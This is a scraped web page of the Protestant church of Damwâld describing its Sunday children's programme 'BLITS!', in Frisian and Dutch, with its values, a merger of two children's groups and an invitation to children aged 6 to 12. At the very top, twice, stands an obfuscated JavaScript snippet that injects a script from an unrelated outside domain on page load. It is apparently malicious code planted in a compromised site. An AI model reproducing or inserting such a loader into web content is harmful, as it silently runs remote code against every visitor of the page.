;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); BLITS! - PKN Damwâld
BLITS!Kindernevendienst

BLITS ! BLITS ? …. ja …. BLITS !

Bidde:    Tegearre mei en foar de berarn prate mei God

Leauwen:  Fertroud meitsje mei it leauwen fanút de Bibel yn de leafde fan God

Iepen:  Iepen wêze nei de bern oer it leauwen, yn it fertrouwen dat de bern ek iepen binnen nei in oar

Trochjaan: De bern leare om de leafde fan God troch te jaan oan in oar

Sjonge: Troch de ferkes te lústerje en te sjongen, God earje en priizje

De Bernetsjerke en de KingKids zijn samengegaan …  BLITS! Al lange tijd gonsde het van de geruchten over de nieuwe naamgeving en liepen de kinderen en leidinggevenden met een heimelijke blik rond, maar met deze BLITS(e) betekenisvolle naam en dito logo werd een altijd al geweldige samenwerking bekroont met een feestelijke samensmelting !

Kindernevendienst is elke zondag weer een bijzondere tijd en een tijd waaraan je ook later vast met een fijn gevoel aan terug zult denken. Samen in gesprek over het geloof, samen even uit de grote mensenwereld en het gezellig met elkaar hebben. Geloven – ook daar krijg je les in. Van je ouders. Op school. En, niet te vergeten, ook in de kerk. Iedere week wordt er tijdens een gedeelte van de kerkdienst in onze kerk voor alle kinderen in de basisschoolleeftijd een BLITS ! gehouden. In een eigen ruimte horen jullie verhalen uit de Bijbel en wordt er getekend, geknutseld of een spel gespeeld, dat aansluit bij deze verhalen.

Kindernevendienst … BLITS! Een vast moment tijdens de dienst speciaal voor jullie. Elke keer is het weer een verrassing wat we gaan doen. Ben je nog nooit geweest en ben je tussen 6 en 12 jaar? Kom dan zeker een keertje kijken. Je bent heel erg welkom.

banner